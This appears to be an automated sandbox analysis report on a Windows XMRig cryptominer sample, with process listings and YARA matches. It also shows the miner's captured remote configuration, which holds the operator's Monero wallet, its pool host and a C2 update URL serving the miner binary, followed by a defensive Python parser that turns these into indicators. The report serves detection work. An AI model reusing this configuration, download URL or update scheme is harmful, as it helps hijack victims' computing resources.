                                                                                                                                        Data Raw: 5b 4d 69 6e 65 72 5d 0a 61 64 64 72 65 73 73 3d 34 38 51 62 50 5a 55 74 57 6d 38 67 47 36 54 36 65 67 36 48 37 4a 47 58 61 44 36 65 4e 4a 48 38 6f 33 52 6f 79 4c 67 42 65 71 79 6d 37 54 78 79 64 55 39 54 66 4d 66 55 55 67 61 68 65 71 61 37 42 46 64 68 74 66 62 39 64 36 36 35 43 67 59 44 6a 36 66 35 4b 76 64 6a 4c 65 47 4a 6d 64 57 2e 57 4f 52 4b 45 52 2f 70 69 63 6b 74 75 74 6f 73 09 09 09 3b 20 58 4d 52 20 61 64 64 72 65 73 73 2c 20 65 6d 61 69 6c 20 28 6d 69 6e 65 72 67 61 74 65 29 2c 20 62 74 63 20 61 64 64 72 65 73 73 20 28 6e 69 63 65 68 61 73 68 29 2c 20 65 74 63 2e 0a 70 6f 6f 6c 70 6f 72 74 3d 78 6d 72 2d 75 73 2d 65 61 73 74 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 3a 31 34 34 34 34 09 09 3b 20 44 6f 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 73 74 72 61 74 75 6d 2b 74 63 70 3a 2f 2f 27 20 65 2e 67 20 6d 6f 6e 65 72 6f 68 61 73 68 2e 63 6f 6d 3a 33 33 33 33 0a 70 61 73 73 77 6f 72 64 3d 09 09 09 09 3b 20 50 6f 6f 6c 20 70 61 73 73 77 6f 72 64 0a 73 74 6f 70 3d 30 09 09 09 09 09 3b 20 43 68 61 6e 67 65 20 74 68 69 73 20 76 61 6c 75 65 20 74 6f 20 22 31 22 20 74 6f 20 73 74 6f 70 20 6d 69 6e 65 72 2e 20 49 66 20 6e 6f 74 20 73 70 65 63 69 66 69 65 64 20 6f 72 20 65 71 75 61 6c 20 74 6f 20 22 30 22 20 6d 69 6e 65 72 20 77 69 6c 6c 20 77 6f 72 6b 2e 20 0a 70 72 6f 78 79 3d 30 09 09 09 09 09 3b 20 43 68 61 6e 67 65 20 74 68 69 73 20 76 61 6c 75 65 20 74 6f 20 22 31 22 20 69 66 20 79 6f 75 20 61 72 65 20 6d 69 6e 69 6e 67 20 74 6f 20 78 6d 72 69 67 2d 70 72 6f 78 79 20 69 6e 73 74 65 61 64 20 6f 66 20 70 6f 6f 6c 2e 20 54 68 69 73 20 65 6e 61 62 6c 65 73 20 75 73 69 6e 67 20 61 20 75 6e 71 69 75 65 20 61 64 64 72 65 73 73 20 70 65 72 20 77 6f 72 6b 65 72 20 66 6f 72 20 62 65 74 74 65 72 20 6d 69 6e 65 72 20 6d 6f 6e 69 74 6f 72 69 6e 67 2e 0a 6b 65 65 70 61 6c 69 76 65 3d 30 09 09 09 09 3b 20 30 20 74 6f 20 64 69 73 61 
62 6c 65 20 6b 65 65 70 61 6c 69 76 65 2c 20 31 20 74 6f 20 65 6e 61 62 6c 65 20 6b 65 65 70 61 6c 69 76 65 0a 0a 5b 55 70 64 61 74 65 5d 0a 3b 63 6f 6e 66 69 67 5f 75 72 6c 3d 68 74 74 70 3a 2f 2f 78 6d 72 6d 69 6e 65 72 2e 6e 65 74 2f 63 6f 6e 66 69 67 2e 74 78 74 20 20 20 09 3b 20 59 6f 75 20 63 61 6e 20 75 70 64 61 74 65 20 74 68 65 20 75 72 6c 20 74 68 61 74 20 70 6f 69 6e 74 73 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 69 6c 65 2e 20 4d 75 73 74 20 62 65 67 69 6e 20 77 69 74 68 20 22 68 74 74 70 3a 2f 2f 22 20 6f 72 20 22 68 74 74 70 73 3a 2f 2f 22 20 0a 6b 6e 6f 63 6b 5f 74 69 6d 65 3d 33 30 20 09 09 09 09 20 20 20 20 20 09 3b 20 4e 75 6d 62 65 72 20 6f 66 20 6d 69 6e 75 74 65 73 20 74 68 65 20 6d 69 6e 65 72 20 77 61 69 74 73 20 62 65 74 77 65 65 6e 20 76 69 73 69 74 73 20 74 6f 20 63 6f 6e 66 69 67 20 66 69 6c 65 2e 20 49 66 20 6e 65 76 65 72 20 73 70 65 63 69 66 69 65 64 2c 20 64 65 66 61 75 6c 74 20 69 73 20 33 30 20 6d 69 6e 75 74 65 73 2e 20 0a 75 70 64 61 74 65 5f 75 72 6c 3d 68 74 74 70 3a 2f 2f 34 35 2e 31 34 34 2e 32 32 35 2e 31 33 35 2f 6e 6f 74 65 70 61 64 2e 65 78 65 09 09 3b 20 75 72 6c 20 6f 66 20 6e 65 77 20 6d 69 6e 65 72 2e 20 4d 69 6e 65 72 20 77 69 6c
Data Ascii (line breaks restored from the 0a bytes in Data Raw; the tab runs before each ';' comment are shown as one space):
[Miner]
address=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos ; XMR address, email (minergate), btc address (nicehash), etc.
poolport=xmr-us-east1.nanopool.org:14444 ; Do not include 'stratum+tcp://' e.g monerohash.com:3333
password= ; Pool password
stop=0 ; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work.
proxy=0 ; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.
keepalive=0 ; 0 to disable keepalive, 1 to enable keepalive

[Update]
;config_url=http://xmrminer.net/config.txt ; You can update the url that points to the configuration file. Must begin with "http://" or "https://"
knock_time=30 ; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes.
update_url=http://45.144.225.135/notepad.exe ; url of new miner. Miner wil
Jul 14, 2021 07:04:11.392072916 CEST | 1406 | IN | Data Raw: 6c 20 67 65 74 20 75 70 64 61 74 65 64 20 77 69 74 68 20 74 68 69 73 20 66 69 6c 65 2e 20 0a 75 70 64 61 74 65 5f 68 61 73 68 3d 39 64 62 63 66 31 38 33 37 36 32 38 37 32 64 38 39 31 37 62 38 61 31 39 35 33 35 61 30 63 36 35 09 09 09 09 3b 20 6d
Data Ascii (continuation of the same response body; line break restored from the 0a byte):
l get updated with this file.
update_hash=9dbcf183762872d8917b8a19535a0c65 ; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated!;End
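The response body above is the miner's remote INI-style configuration: the [Miner] section names the wallet and the Stratum pool (the same xmr-us-east1.nanopool.org host that the DNS tables show being resolved), and the [Update] section names a download URL and an MD5 that the miner compares against the downloaded file before replacing itself. Note that the advertised update_hash (9dbcf18…) is the MD5 of the very sample analysed here (listed in the process entries below), so at capture time the only "update" on offer was the current binary, and that MD5 is an integrity check against a file served by the same host that serves the config, not an authentication of it. As an added example that is not part of the report or of the malware, the Python below parses the captured text into indicators, joins the pool host with the A records from the DNS Answers table, and reproduces the update gate. The config text, DNS answers and sample MD5 are transcribed from this page; using configparser for the format and reading the address as a nanopool-style WALLET.WORKER/EMAIL string are this example's own assumptions, drawn from the operator's comments in the file.

```python
"""Parse the miner's remote config.txt and turn it into indicators.

Added example, not code from the sandbox report or the malware. CAPTURED_CONFIG is
transcribed from the Data Ascii dump above (typos kept), DNS_ANSWERS from the DNS
Answers table, SAMPLE_MD5 from the process list. Using configparser for the format
and reading 'address' as nanopool-style WALLET.WORKER/EMAIL are assumptions.
"""
import configparser
import hashlib
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed input: the config.txt body as captured, tabs and typos preserved.
CAPTURED_CONFIG = """[Miner]
address=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos\t\t\t; XMR address, email (minergate), btc address (nicehash), etc.
poolport=xmr-us-east1.nanopool.org:14444\t\t; Do not include 'stratum+tcp://' e.g monerohash.com:3333
password=\t\t\t\t; Pool password
stop=0\t\t\t\t\t; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work. 
proxy=0\t\t\t\t\t; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.
keepalive=0\t\t\t\t; 0 to disable keepalive, 1 to enable keepalive

[Update]
;config_url=http://xmrminer.net/config.txt   \t; You can update the url that points to the configuration file. Must begin with "http://" or "https://" 
knock_time=30 \t\t\t\t     \t; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes. 
update_url=http://45.144.225.135/notepad.exe\t\t; url of new miner. Miner will get updated with this file. 
update_hash=9dbcf183762872d8917b8a19535a0c65\t\t\t\t; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated!
;End
"""

# MD5 of P7Oa6i5muL.exe as listed in this report's process entries.
SAMPLE_MD5 = "9dbcf183762872d8917b8a19535a0c65"

# Constructed from the DNS Answers table above: A records returned for the pool host.
DNS_ANSWERS = {
    "xmr-us-east1.nanopool.org": [
        "142.44.242.100", "142.44.243.6", "144.217.14.109", "192.99.69.170", "144.217.14.139",
    ],
}


@dataclass(frozen=True)
class MinerIOCs:
    wallet: str          # 95-character Monero address
    worker: str          # pool-side label after the first '.' (nanopool WORKER/EMAIL convention, assumed)
    pool_host: str
    pool_port: int
    kill_switch_set: bool   # stop=1 tells the miner to idle (operator's own comment)
    update_url: str
    update_hash: str        # MD5 the miner requires of the downloaded update
    poll_minutes: int       # knock_time: how often config.txt is re-fetched


def parse_miner_config(text: str) -> MinerIOCs:
    """Parse the INI-style body; ';' starts a comment, both full-line and after a value."""
    cp = configparser.ConfigParser(inline_comment_prefixes=(";",), interpolation=None)
    cp.read_string(text)
    miner, update = cp["Miner"], cp["Update"]
    wallet, _, worker = miner["address"].partition(".")
    host, _, port = miner["poolport"].rpartition(":")
    return MinerIOCs(
        wallet=wallet,
        worker=worker,
        pool_host=host,
        pool_port=int(port),
        kill_switch_set=miner.get("stop", "0") == "1",
        update_url=update["update_url"],
        update_hash=update["update_hash"].lower(),
        poll_minutes=update.getint("knock_time", fallback=30),
    )


def c2_host(iocs: MinerIOCs) -> str:
    """Host the miner polls for config/update traffic, taken from update_url."""
    return urlparse(iocs.update_url).hostname


def pool_endpoints(iocs: MinerIOCs, dns_answers: dict[str, list[str]]) -> list[str]:
    """Socket-level indicators: every resolved pool address joined with the Stratum port."""
    return sorted(f"{ip}:{iocs.pool_port}" for ip in dns_answers.get(iocs.pool_host, []))


def update_accepted(payload: bytes, iocs: MinerIOCs) -> bool:
    """The gate the operator's comment describes: run the update only if its MD5 matches.

    This is integrity only, not authentication: whoever serves config.txt sets both
    the URL and the hash, so a hijacked server passes trivially.
    """
    return hashlib.md5(payload, usedforsecurity=False).hexdigest() == iocs.update_hash


def update_is_current_sample(iocs: MinerIOCs, sample_md5: str) -> bool:
    """True when the advertised update is byte-identical (by MD5) to the sample analysed."""
    return iocs.update_hash == sample_md5.lower()


if __name__ == "__main__":
    iocs = parse_miner_config(CAPTURED_CONFIG)
    print(iocs)
    print("C2 host:", c2_host(iocs))
    print("pool endpoints:", pool_endpoints(iocs, DNS_ANSWERS))
    print("update is the analysed sample:", update_is_current_sample(iocs, SAMPLE_MD5))
```

The indicators to block are therefore the C2 host (config and update fetches over plain HTTP with a WinInetGet/0.1 User-Agent), the pool host and the five resolved addresses on port 14444, and the wallet string, which identifies the operator across pools. The stop flag is worth watching for as well: flipping it to 1 from the C2 side is how the operator idles the fleet without touching the hosts.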


                                                                                                                                        Code Manipulations

                                                                                                                                        Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

                                                                                                                                        System Behavior

General

Start time: 07:03:53
Start date: 14/07/2021
Path: C:\Users\user\Desktop\P7Oa6i5muL.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\P7Oa6i5muL.exe'
Imagebase: 0x8b0000
File size: 2241536 bytes
MD5 hash: 9DBCF183762872D8917B8A19535A0C65
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

General

Start time: 07:03:59
Start date: 14/07/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff7488e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:04:04
Start date: 14/07/2021
Path: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
Imagebase: 0x840000
File size: 2241536 bytes
MD5 hash: 9DBCF183762872D8917B8A19535A0C65
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.470611042.0000000003320000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 21%, ReversingLabs
Reputation: low

General

Start time: 07:04:05
Start date: 14/07/2021
Path: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe
Imagebase: 0x11e0000
File size: 909312 bytes
MD5 hash: 77276DDC82248473D033E2494C438A97
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000000.221202486.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000000.224986002.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000000.229478984.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 07:04:11
Start date: 14/07/2021
Path: C:\Windows\notepad.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
Imagebase: 0x7ff6dc290000
File size: 245760 bytes
MD5 hash: BB9A06B8F2DD9D24C77F389D7B2B58D2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.456029595.0000018420035000.00000004.00000001.sdmp, Author: Joe Security
Reputation: high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:22
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:24
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:28
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:29
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:29
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                                                                                                                                        Imagebase:0x1270000
                                                                                                                                        File size:147456 bytes
                                                                                                                                        MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:35
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:36
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:36
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:37
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:37
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:07:04:37
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:07:04:38
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                        Imagebase:0x7ff6f6090000
                                                                                                                                        File size:163336 bytes
                                                                                                                                        MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:07:04:39
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:07:04:52
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:07:05:40
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                                        Imagebase:0x7ff7f0b50000
                                                                                                                                        File size:455656 bytes
                                                                                                                                        MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:07:05:41
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Disassembly

                                                                                                                                        Code Analysis


                                                                                                                                          Executed Functions

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: D
                                                                                                                                          • API String ID: 0-2746444292
                                                                                                                                          • Opcode ID: 8c29aacfb7e5d82d5853e06031eb13d1b8e2013ff5888594ad4b434b92d3de13
                                                                                                                                          • Instruction ID: 527409e70ed7958249f334849d06343695d507deb045e1986b04ff4d36a1b64e
                                                                                                                                          • Opcode Fuzzy Hash: 8c29aacfb7e5d82d5853e06031eb13d1b8e2013ff5888594ad4b434b92d3de13
                                                                                                                                          • Instruction Fuzzy Hash: 2F7216B4A102188FDB64EF68D894B9AB7F2FF88300F1484A9E50ADB755DB349D81CF51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 750581f5a8e64c28e7efc5ad449b06d8ca0da7bbc05b8efa9082b24ba9acb8d1
                                                                                                                                          • Instruction ID: e6bf317611ca1e863bc7f60225e5457959a1daaf7b7910ab1526d95374228d79
                                                                                                                                          • Opcode Fuzzy Hash: 750581f5a8e64c28e7efc5ad449b06d8ca0da7bbc05b8efa9082b24ba9acb8d1
                                                                                                                                          • Instruction Fuzzy Hash: C55259B5A10606DFCB14DF68D5849AAFBF2FF48310B198969D84A8B752C734FC41DB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7919c6503adcc55c5eaf3337f5b05a1f19766afdbcd97f8404dc3c03ff84521c
                                                                                                                                          • Instruction ID: c9eef66459536368b7150b1fd802362bfbcc66b8f33c4b404792008985f0029e
                                                                                                                                          • Opcode Fuzzy Hash: 7919c6503adcc55c5eaf3337f5b05a1f19766afdbcd97f8404dc3c03ff84521c
                                                                                                                                          • Instruction Fuzzy Hash: 844259B0B102469FDB14DF78C494A6ABBF2BF89304F1A8869D4469B3A1DB34EC41CB51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ff4fcd89d8d79d9ae536089f3177ad9b480b347f5b6b795bfe84557917aec67a
                                                                                                                                          • Instruction ID: 04ea07b62939969e2cea54e46bf19a7b155608a6d2020c35bdf438b097e3b652
                                                                                                                                          • Opcode Fuzzy Hash: ff4fcd89d8d79d9ae536089f3177ad9b480b347f5b6b795bfe84557917aec67a
                                                                                                                                          • Instruction Fuzzy Hash: B3428BB0A10246DFCB248F39D58866AB7F6BF85325F18847DE496CB790DB35E881CB10
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dccf3c48f96aa1530dd66115a2e201db5c0c026bee11041e331025cbf627566f
                                                                                                                                          • Instruction ID: bbc447eaf8143ebd2f8d8861392408ea4e4eebbdb1a9a5ceda48e2011358824b
                                                                                                                                          • Opcode Fuzzy Hash: dccf3c48f96aa1530dd66115a2e201db5c0c026bee11041e331025cbf627566f
                                                                                                                                          • Instruction Fuzzy Hash: 43129EB5A102459FCB04DF69C5849AABBF2FF89304F1AC4A9E449DB362D734ED41CB60
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d5478ce19325892d1b5b83a654165dca63edfa68e953fc855b7adb3202740638
